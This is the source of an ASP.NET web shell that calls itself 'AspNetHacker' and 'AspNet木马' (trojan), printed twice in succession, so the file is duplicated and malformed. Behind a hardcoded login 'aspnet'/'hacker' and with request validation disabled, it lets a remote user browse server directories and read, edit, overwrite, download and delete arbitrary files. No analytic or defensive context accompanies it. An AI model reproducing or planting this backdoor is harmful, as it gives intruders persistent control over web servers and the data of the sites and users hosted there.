<%@ Page Language="C#" Debug="true" ValidateRequest="false"%>
<%@ Import Namespace="System.IO" %>
<script runat="server">
string NewLine;
string NowPath = "";
string NowFile = "";
protected void Page_Load(object sender, EventArgs e)
{
NewLine = Environment.NewLine;
ShowHeader();
string Action = Request.QueryString["action"];
if (Action == "chk")
{
ChkUser();
}
NowPath =HttpUtility.UrlDecode( Request.QueryString["path"] + "");
NowFile = HttpUtility.UrlDecode(Request.QueryString["file"] + "");
if (Session["aspnet"] == null || Session["aspnet"].ToString() != "hacker")
{
ShowLog();
ShowFooter();
}
switch (Action)
{
case "up":
NowFile = HttpUtility.UrlDecode(Request.Form["file"] + "");
UpFile();
break;
case "del":
DelFile();
break;
case "down":
DownLoadFile();
break;
case "sf":
ShowFileInfo();
ShowFooter();
break;
}
ShowDictionarys();
ShowFooter();
}
private void DelFile()
{
if (File.Exists(NowFile))
{
try
{
File.Delete(NowFile);
}
catch (Exception e)
{
Response.Write("<script>alert('删除失败:"+e.Message+"!');history.back();</" + "script>");
Response.End();
}
}
}
private void ShowFileInfo()
{
if (File.Exists(NowFile))
{
try
{
Response.Write("<div align='center'><form method='post' action='?action=up&path="+HttpUtility.UrlEncode(NowPath)+"'>");
Response.Write("<input type='hidden' value='" + HttpUtility.UrlEncode(NowFile) + "' name='file'/>");
Stream s = File.Open(NowFile, FileMode.Open, FileAccess.Read);
Encoding encoding = GetFileEncoding(s);//获取文件编码
Response.Write("<input type='hidden' value='"+encoding.CodePage+"' name='encoding'/>");
s.Position = 0;
Response.Write("<textarea name='ct' style='width:650px;height=500px'>");
StreamReader sr = new StreamReader(s, encoding);
Response.Write(sr.ReadToEnd());
sr.Close();
s.Close();
Response.Write("</textarea><br/><input type='submit' value='修改'/></form></div>");
}
catch (Exception e)
{
Response.Write("<script>alert('读取失败:" + e.Message + "!');history.back();</" + "script>");
Response.End();
}
}
else
{
Response.Write("<script>alert('文件不存在!');history.back();</" + "script>");
Response.End();
}
}
private void UpFile()
{
if (File.Exists(NowFile))
{
try
{
Encoding encoding = Encoding.GetEncoding(int.Parse(Request.Form["encoding"]));
StreamWriter sw = new StreamWriter(NowFile, false, encoding);
sw.Write(Request.Form["ct"]);
sw.Close();
Response.Write("<script>alert('保存成功!');</" + "script>");
}
catch (Exception e)
{
Response.Write("<script>alert('保存失败:" + e.Message + "!');history.back();</" + "script>");
Response.End();
}
}
else
{
Response.Write("<script>alert('文件不存在!');history.back();</" + "script>");
Response.End();
}
}
private void DownLoadFile()
{
if (File.Exists(NowFile))
{
try
{
string Ext = Path.GetExtension(NowFile).Replace(".", "");
string Name = Path.GetFileName(NowFile);
string Mime = "";
switch (Ext)
{
case "jpg":
Mime = "image/" + Ext;
break;
case "png":
Mime = "image/" + Ext;
break;
case "gif":
Mime = "image/" + Ext;
break;
case "bmp":
Mime = "application/x-MS-bmp";
break;
case "ico":
Mime = "application/octet-stream";
break;
case "rar":
Mime = "application/x-rar-compressed";
break;
case "html":
Mime = "text/html";
break;
case "htm":
Mime = "text/htm";
break;
case "asp":
Mime = "text/plain";
break;
case "aspx":
Mime = "text/plain";
break;
case "jsp":
Mime = "text/plain";
break;
case "php":
Mime = "text/plain";
break;
case "do":
Mime = "text/plain";
break;
case "txt":
Mime = "text/plain";
break;
default:
Mime = "application/octet-stream";
break;
}
Response.Clear();
Response.ContentType = Mime;
Response.AddHeader("Content-Disposition", "attachment;filename=\"" + Name + "\"");
Response.WriteFile(NowFile);
Response.Flush();
}
catch (Exception e)
{
Response.Write("<script>alert('文件下载失败:"+e.Message+"!');self.close();</" + "script>");
Response.End();
}
}
else
{
Response.Write("<script>alert('文件不存在!');self.close();</" + "script>");
Response.End();
}
}
private void ChkUser()
{
if (Request.Form["un"] == "aspnet" && Request.Form["pwd"] == "hacker")
{
Session["aspnet"] = "hacker";
}
else
{
Response.Write("<script>alert('用户名或者密码出错!');history.back();</"+"script>");
Response.End();
}
}
private void ShowTable(bool IsHeader)
{
if (IsHeader)
{
Response.Write(NewLine+"<script>function Reload(path){window.location='?path='+path;}"+NewLine
+ "function DelConfirm(path,file){if(confirm('确认删除!?')){window.location='?action=del&path='+path+'&file='+file;}}" + NewLine
+ "function DownLoad(path){window.open('?action=down&file='+path);}</" + "script>" + NewLine);
Response.Write("<table border='1px' bordercolor='black' style='width:600px;' align='center'><tr>" + NewLine);
}
else
{
Response.Write("</tr></table>");
}
}
private void ShowDictionarys()
{
ShowTable(true);
try
{
DirectoryInfo DirInfo;
if (NowPath == "")
DirInfo = new DirectoryInfo(Server.MapPath(""));
else
DirInfo = new DirectoryInfo(NowPath);
DirectoryInfo[] Dirs = DirInfo.GetDirectories();
Response.Write("<td width='30%' valign='top'>");
Response.Write("<div title='双击返回' ondblclick=\"Reload('" + HttpUtility.UrlEncode(DirInfo.Parent.FullName) + "')\">返回上级目录</div>");
foreach (DirectoryInfo d in Dirs)
{
Response.Write("<div title='双击进入' ondblclick=\"Reload('" + HttpUtility.UrlEncode(d.FullName) + "')\">" + d.Name + "</div>");
}
Response.Write("</td>");
ShowFiles(DirInfo.GetFiles());
}
catch
{
Response.Write("<script>alert('没有权限访问这个目录!');history.back();</" + "script>");
Response.End();
}
}
private void ShowFiles(FileInfo[] Files)
{
Response.Write("<td width='70%' valign='top'>");
Response.Write("<table width='100%'>");
Response.Write("<tr><td width='70%'><b>文件名称</b></td><td width='30%' align='center'><b>操作</b></td></tr>");
Response.Write("<tr><td height='2px' colspan='2' style='background-color:black'></td></tr>");
string Ext = "";
foreach (FileInfo fi in Files)
{
Ext = fi.Extension.ToLower().Replace(".", "");
Response.Write("<tr><td title=\"类型:" + Ext + NewLine
+ "大小:" + Math.Ceiling((double)fi.Length / (double)1024) + "kb" + NewLine
+ "最后修改:" + fi.LastWriteTime.ToString() + "\"><font color='red'>" +fi.Name+
"</font></td>");
Response.Write("<td>");
if (Ext != "jpg" && Ext != "gif" && Ext != "bmp" && Ext != "ico" && Ext != "png"&&Ext!="rar")
Response.Write("<a href='?action=sf&path="+HttpUtility.UrlEncode(NowPath)+
"&file=" + HttpUtility.UrlEncode(fi.FullName) + "'>编辑</a> ");
Response.Write("<a href='#' onclick=\"DownLoad('" + HttpUtility.UrlEncode(fi.FullName) + "')\">下载</a> ");
Response.Write("<a href='#' onclick=\"DelConfirm('"+HttpUtility.UrlEncode(NowPath)+
"','"+HttpUtility.UrlEncode( fi.FullName)+"')\">删除</a></td></tr>");
}
Response.Write("</table>");
Response.Write("</td>");
ShowTable(false);
}
private Encoding GetFileEncoding(Stream s)
{
Encoding encoding = Encoding.Default;
try
{
byte[] FirstByte = new byte[2];
s.Read(FirstByte, 0, FirstByte.Length);
if (FirstByte[0] == 239 && FirstByte[1] == 187)
return Encoding.UTF8;
else if (FirstByte[0] == 255 && FirstByte[1] == 254)
return Encoding.Unicode;
else if (FirstByte[0] == 254 && FirstByte[1] == 255)
return Encoding.BigEndianUnicode;
}
catch
{ }
return encoding;
}
private void ShowHeader()
{
Response.Write("<html>" + NewLine);
Response.Write("<head>" + NewLine);
Response.Write("<meta http-equiv='content-type'"+
" content='text/html;charset=utf-8'/>" + NewLine);
Response.Write("<title>AspNetHacker</title>" + NewLine);
Response.Write("<style>body{font-size:10pt}" + NewLine + "td{font-size:10pt}" + NewLine
+ "a{font-size:10pt}" + "</style>");
Response.Write("</head><body>" + NewLine);
}
private void ShowLog()
{
Response.Write("<script>function check(f){"+NewLine+"if(f.un.value==''){alert('用户名不能为空!');f.un.focus();return false;}"+
NewLine+"if(f.pwd.value==''){alert('密码不能为空!');f.pwd.focus();return false;}}</" + "script>" + NewLine);
Response.Write("<div align='center'><form method='post' action='?action=chk' onsubmit='return check(this)'>"+NewLine);
Response.Write("用户名:<input type='text' name='un' width='200px'/>"
+ NewLine + "<br/>密码:<input type='password' name='pwd' width='200px'/><br/>"+NewLine
+"<input type='submit' value='提交'/>");
Response.Write("</div></form>");
}
private void ShowFooter()
{
Response.Write("<div align='center'>AspNet木马</div></body></html>");
Response.End();
}
</script>
<%@ Import Namespace="System.IO" %>
<script runat="server">
string NewLine;
string NowPath = "";
string NowFile = "";
protected void Page_Load(object sender, EventArgs e)
{
NewLine = Environment.NewLine;
ShowHeader();
string Action = Request.QueryString["action"];
if (Action == "chk")
{
ChkUser();
}
NowPath =HttpUtility.UrlDecode( Request.QueryString["path"] + "");
NowFile = HttpUtility.UrlDecode(Request.QueryString["file"] + "");
if (Session["aspnet"] == null || Session["aspnet"].ToString() != "hacker")
{
ShowLog();
ShowFooter();
}
switch (Action)
{
case "up":
NowFile = HttpUtility.UrlDecode(Request.Form["file"] + "");
UpFile();
break;
case "del":
DelFile();
break;
case "down":
DownLoadFile();
break;
case "sf":
ShowFileInfo();
ShowFooter();
break;
}
ShowDictionarys();
ShowFooter();
}
private void DelFile()
{
if (File.Exists(NowFile))
{
try
{
File.Delete(NowFile);
}
catch (Exception e)
{
Response.Write("<script>alert('删除失败:"+e.Message+"!');history.back();</" + "script>");
Response.End();
}
}
}
private void ShowFileInfo()
{
if (File.Exists(NowFile))
{
try
{
Response.Write("<div align='center'><form method='post' action='?action=up&path="+HttpUtility.UrlEncode(NowPath)+"'>");
Response.Write("<input type='hidden' value='" + HttpUtility.UrlEncode(NowFile) + "' name='file'/>");
Stream s = File.Open(NowFile, FileMode.Open, FileAccess.Read);
Encoding encoding = GetFileEncoding(s);//获取文件编码
Response.Write("<input type='hidden' value='"+encoding.CodePage+"' name='encoding'/>");
s.Position = 0;
Response.Write("<textarea name='ct' style='width:650px;height=500px'>");
StreamReader sr = new StreamReader(s, encoding);
Response.Write(sr.ReadToEnd());
sr.Close();
s.Close();
Response.Write("</textarea><br/><input type='submit' value='修改'/></form></div>");
}
catch (Exception e)
{
Response.Write("<script>alert('读取失败:" + e.Message + "!');history.back();</" + "script>");
Response.End();
}
}
else
{
Response.Write("<script>alert('文件不存在!');history.back();</" + "script>");
Response.End();
}
}
private void UpFile()
{
if (File.Exists(NowFile))
{
try
{
Encoding encoding = Encoding.GetEncoding(int.Parse(Request.Form["encoding"]));
StreamWriter sw = new StreamWriter(NowFile, false, encoding);
sw.Write(Request.Form["ct"]);
sw.Close();
Response.Write("<script>alert('保存成功!');</" + "script>");
}
catch (Exception e)
{
Response.Write("<script>alert('保存失败:" + e.Message + "!');history.back();</" + "script>");
Response.End();
}
}
else
{
Response.Write("<script>alert('文件不存在!');history.back();</" + "script>");
Response.End();
}
}
private void DownLoadFile()
{
if (File.Exists(NowFile))
{
try
{
string Ext = Path.GetExtension(NowFile).Replace(".", "");
string Name = Path.GetFileName(NowFile);
string Mime = "";
switch (Ext)
{
case "jpg":
Mime = "image/" + Ext;
break;
case "png":
Mime = "image/" + Ext;
break;
case "gif":
Mime = "image/" + Ext;
break;
case "bmp":
Mime = "application/x-MS-bmp";
break;
case "ico":
Mime = "application/octet-stream";
break;
case "rar":
Mime = "application/x-rar-compressed";
break;
case "html":
Mime = "text/html";
break;
case "htm":
Mime = "text/htm";
break;
case "asp":
Mime = "text/plain";
break;
case "aspx":
Mime = "text/plain";
break;
case "jsp":
Mime = "text/plain";
break;
case "php":
Mime = "text/plain";
break;
case "do":
Mime = "text/plain";
break;
case "txt":
Mime = "text/plain";
break;
default:
Mime = "application/octet-stream";
break;
}
Response.Clear();
Response.ContentType = Mime;
Response.AddHeader("Content-Disposition", "attachment;filename=\"" + Name + "\"");
Response.WriteFile(NowFile);
Response.Flush();
}
catch (Exception e)
{
Response.Write("<script>alert('文件下载失败:"+e.Message+"!');self.close();</" + "script>");
Response.End();
}
}
else
{
Response.Write("<script>alert('文件不存在!');self.close();</" + "script>");
Response.End();
}
}
private void ChkUser()
{
if (Request.Form["un"] == "aspnet" && Request.Form["pwd"] == "hacker")
{
Session["aspnet"] = "hacker";
}
else
{
Response.Write("<script>alert('用户名或者密码出错!');history.back();</"+"script>");
Response.End();
}
}
private void ShowTable(bool IsHeader)
{
if (IsHeader)
{
Response.Write(NewLine+"<script>function Reload(path){window.location='?path='+path;}"+NewLine
+ "function DelConfirm(path,file){if(confirm('确认删除!?')){window.location='?action=del&path='+path+'&file='+file;}}" + NewLine
+ "function DownLoad(path){window.open('?action=down&file='+path);}</" + "script>" + NewLine);
Response.Write("<table border='1px' bordercolor='black' style='width:600px;' align='center'><tr>" + NewLine);
}
else
{
Response.Write("</tr></table>");
}
}
private void ShowDictionarys()
{
ShowTable(true);
try
{
DirectoryInfo DirInfo;
if (NowPath == "")
DirInfo = new DirectoryInfo(Server.MapPath(""));
else
DirInfo = new DirectoryInfo(NowPath);
DirectoryInfo[] Dirs = DirInfo.GetDirectories();
Response.Write("<td width='30%' valign='top'>");
Response.Write("<div title='双击返回' ondblclick=\"Reload('" + HttpUtility.UrlEncode(DirInfo.Parent.FullName) + "')\">返回上级目录</div>");
foreach (DirectoryInfo d in Dirs)
{
Response.Write("<div title='双击进入' ondblclick=\"Reload('" + HttpUtility.UrlEncode(d.FullName) + "')\">" + d.Name + "</div>");
}
Response.Write("</td>");
ShowFiles(DirInfo.GetFiles());
}
catch
{
Response.Write("<script>alert('没有权限访问这个目录!');history.back();</" + "script>");
Response.End();
}
}
private void ShowFiles(FileInfo[] Files)
{
Response.Write("<td width='70%' valign='top'>");
Response.Write("<table width='100%'>");
Response.Write("<tr><td width='70%'><b>文件名称</b></td><td width='30%' align='center'><b>操作</b></td></tr>");
Response.Write("<tr><td height='2px' colspan='2' style='background-color:black'></td></tr>");
string Ext = "";
foreach (FileInfo fi in Files)
{
Ext = fi.Extension.ToLower().Replace(".", "");
Response.Write("<tr><td title=\"类型:" + Ext + NewLine
+ "大小:" + Math.Ceiling((double)fi.Length / (double)1024) + "kb" + NewLine
+ "最后修改:" + fi.LastWriteTime.ToString() + "\"><font color='red'>" +fi.Name+
"</font></td>");
Response.Write("<td>");
if (Ext != "jpg" && Ext != "gif" && Ext != "bmp" && Ext != "ico" && Ext != "png"&&Ext!="rar")
Response.Write("<a href='?action=sf&path="+HttpUtility.UrlEncode(NowPath)+
"&file=" + HttpUtility.UrlEncode(fi.FullName) + "'>编辑</a> ");
Response.Write("<a href='#' onclick=\"DownLoad('" + HttpUtility.UrlEncode(fi.FullName) + "')\">下载</a> ");
Response.Write("<a href='#' onclick=\"DelConfirm('"+HttpUtility.UrlEncode(NowPath)+
"','"+HttpUtility.UrlEncode( fi.FullName)+"')\">删除</a></td></tr>");
}
Response.Write("</table>");
Response.Write("</td>");
ShowTable(false);
}
private Encoding GetFileEncoding(Stream s)
{
Encoding encoding = Encoding.Default;
try
{
byte[] FirstByte = new byte[2];
s.Read(FirstByte, 0, FirstByte.Length);
if (FirstByte[0] == 239 && FirstByte[1] == 187)
return Encoding.UTF8;
else if (FirstByte[0] == 255 && FirstByte[1] == 254)
return Encoding.Unicode;
else if (FirstByte[0] == 254 && FirstByte[1] == 255)
return Encoding.BigEndianUnicode;
}
catch
{ }
return encoding;
}
private void ShowHeader()
{
Response.Write("<html>" + NewLine);
Response.Write("<head>" + NewLine);
Response.Write("<meta http-equiv='content-type'"+
" content='text/html;charset=utf-8'/>" + NewLine);
Response.Write("<title>AspNetHacker</title>" + NewLine);
Response.Write("<style>body{font-size:10pt}" + NewLine + "td{font-size:10pt}" + NewLine
+ "a{font-size:10pt}" + "</style>");
Response.Write("</head><body>" + NewLine);
}
private void ShowLog()
{
Response.Write("<script>function check(f){"+NewLine+"if(f.un.value==''){alert('用户名不能为空!');f.un.focus();return false;}"+
NewLine+"if(f.pwd.value==''){alert('密码不能为空!');f.pwd.focus();return false;}}</" + "script>" + NewLine);
Response.Write("<div align='center'><form method='post' action='?action=chk' onsubmit='return check(this)'>"+NewLine);
Response.Write("用户名:<input type='text' name='un' width='200px'/>"
+ NewLine + "<br/>密码:<input type='password' name='pwd' width='200px'/><br/>"+NewLine
+"<input type='submit' value='提交'/>");
Response.Write("</div></form>");
}
private void ShowFooter()
{
Response.Write("<div align='center'>AspNet木马</div></body></html>");
Response.End();
}
</script>
